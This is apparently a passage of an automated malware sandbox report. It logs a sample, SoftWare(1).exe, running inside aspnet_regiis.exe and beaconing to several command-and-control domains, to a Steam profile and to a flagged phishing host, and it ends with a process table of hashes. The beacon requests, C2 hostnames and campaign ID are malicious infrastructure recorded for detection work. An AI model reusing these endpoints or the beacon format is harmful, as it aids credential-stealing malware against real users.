                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: vennurviot.sbs
                                                                                    2024-10-14 03:01:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-10-14 03:01:06 UTC829INHTTP/1.1 200 OK
                                                                                    Date: Mon, 14 Oct 2024 03:01:05 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=cjdtuue08ao4vbqt83m560o4cj; expires=Thu, 06 Feb 2025 20:47:44 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FN5sTV%2BJ9MrmXjNaQNzR%2B%2FLCXJg4yqKLwv9CCIu7x9DV29tGQ6edQTMKEzP%2F4dYOYv88vL3aUy%2FIGB7TVMa1jfOtapfVzlvxIzHJUi0E385urbOpBNSt8dKLllZuHQJvsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d2452a63b3b1906-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-14 03:01:06 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-10-14 03:01:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.449735104.21.30.221443280C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 03:01:06 UTC262OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: ehticsprocw.sbs
                                                                                    2024-10-14 03:01:06 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-10-14 03:01:06 UTC815INHTTP/1.1 200 OK
                                                                                    Date: Mon, 14 Oct 2024 03:01:06 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=e4ltsu2umv1shds21omj8du9ee; expires=Thu, 06 Feb 2025 20:47:45 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PmPc17ngazDVJZ0j78Ka1zaV2VkMrayoh1JalydTlDaCP8pG4qJz2wzApTbysYHtABWaD7OOSDDQCmi90VGgtB9euq4A5OKYvwUPlhQ4xRkt62YVIhsxDzW6oPCaKnxBghU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d2452ac6b65c359-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-14 03:01:06 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-10-14 03:01:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.449736172.67.141.136443280C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 03:01:07 UTC263OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: condifendteu.sbs
                                                                                    2024-10-14 03:01:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-10-14 03:01:07 UTC815INHTTP/1.1 200 OK
                                                                                    Date: Mon, 14 Oct 2024 03:01:07 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=dtgel0hoa4ndkfqdbrlr9utc7l; expires=Thu, 06 Feb 2025 20:47:46 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MBkJSLLc071PxuuxhxNSrBvtQnIMbtaZrXcGr%2B6FkwWAZKLCxdmBCmjEPQZ30vpXNKXdVzFQ6xiQl9Ta9KAsltjg5N6cZdJYu92EUcK1v3LVmL0NVlFiLnpfjCPmBkmjxzaR"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d2452b22be50f77-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-14 03:01:07 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-10-14 03:01:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.449737188.114.96.3443280C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 03:01:08 UTC264OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: drawwyobstacw.sbs
                                                                                    2024-10-14 03:01:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-10-14 03:01:08 UTC827INHTTP/1.1 200 OK
                                                                                    Date: Mon, 14 Oct 2024 03:01:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=s270prj9g5afv2d5jqqakbb0gd; expires=Thu, 06 Feb 2025 20:47:47 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbeYB3JPBZYDpUzHof5xs9440LMGyraHAN7w1lGYeOY3Vwvrv7y%2BMmQGJT%2FVLHKjgKu%2BGHoB7H5RX5tBAOlxoiHCoJ9nnzbwFrIIQipnEbrMkOCHHyALdlgkCvh1PFJ4ta9aPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d2452b81febde97-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-14 03:01:08 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-10-14 03:01:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.449738104.102.49.254443280C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 03:01:09 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Host: steamcommunity.com
                                                                                    2024-10-14 03:01:10 UTC1870INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                    Cache-Control: no-cache
                                                                                    Date: Mon, 14 Oct 2024 03:01:10 GMT
                                                                                    Content-Length: 34837
                                                                                    Connection: close
                                                                                    Set-Cookie: sessionid=08024daf03b80e56d8831b23; Path=/; Secure; SameSite=None
                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                    2024-10-14 03:01:10 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                    2024-10-14 03:01:10 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                    Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                    2024-10-14 03:01:10 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                    Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                    2024-10-14 03:01:10 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.449739104.21.53.8443280C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 03:01:11 UTC264OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: sergei-esenin.com
                                                                                    2024-10-14 03:01:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-10-14 03:01:11 UTC555INHTTP/1.1 200 OK
                                                                                    Date: Mon, 14 Oct 2024 03:01:11 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=svii26yPCRabgKY%2BeKQLsAUU9Vwr%2BDGNNwHjU7BHKgThiEUIhxavFvpzBtrdf%2FZ9aOMdGki5SnjRi6Pv1toVQMVKie3PmV2n9FpyJ2jCklSbMin3%2FojGAyWzPtqeyPykrddiDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d2452c8fda20f6b-EWR
                                                                                    2024-10-14 03:01:11 UTC814INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                    Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                    2024-10-14 03:01:11 UTC1369INData Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27
                                                                                    Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
                                                                                    2024-10-14 03:01:11 UTC1369INData Raw: 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69
                                                                                    Data Ascii: agement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <i
                                                                                    2024-10-14 03:01:11 UTC889INData Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62
                                                                                    Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="b
                                                                                    2024-10-14 03:01:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.449740104.21.53.8443280C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 03:01:11 UTC354OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Cookie: __cf_mw_byp=1XYT51TuC4g_X2vBeD8OSXAP7fq2lr4kj4ls6Z9CPMI-1728874871-0.0.1.1-/api
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 85
                                                                                    Host: sergei-esenin.com
                                                                                    2024-10-14 03:01:11 UTC85OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 58 58 58 58 72 74 79 30 35 32 26 6a 3d 31 30 65 38 31 65 62 62 37 38 36 39 33 33 34 63 30 66 39 66 61 30 66 33 30 39 34 30 35 62 62 33
                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@XXXXrty052&j=10e81ebb7869334c0f9fa0f309405bb3
                                                                                    2024-10-14 03:01:12 UTC835INHTTP/1.1 200 OK
                                                                                    Date: Mon, 14 Oct 2024 03:01:12 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=u889pr2f2n3tqid2lhm728d3d3; expires=Thu, 06 Feb 2025 20:47:51 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9nCR2YFyM7hpzdNEvH3QmLW%2FIKYWRhgTaqnnEFq1GfL6ZoucmGS1R34zgSkjbw4AZ%2BHX4%2FPPfupzCfPbAQOf3IivYyGmIOyUtjvTTPKCqIAV%2Fzjyomvk%2BafH79q%2BuN%2FDajnyfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d2452ce6a100f74-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-14 03:01:12 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-10-14 03:01:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:23:00:59
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\SoftWare(1).exe"
                                                                                    Imagebase:0xdd0000
                                                                                    File size:359'936 bytes
                                                                                    MD5 hash:3ADC9C7905F10B8C2C0B0BB7826B67A2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:23:00:59
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:23:01:00
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                    Imagebase:0x5c0000
                                                                                    File size:43'016 bytes
                                                                                    MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:23:01:12
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 1724
                                                                                    Imagebase:0x1c0000
                                                                                    File size:483'680 bytes
                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Reset < >

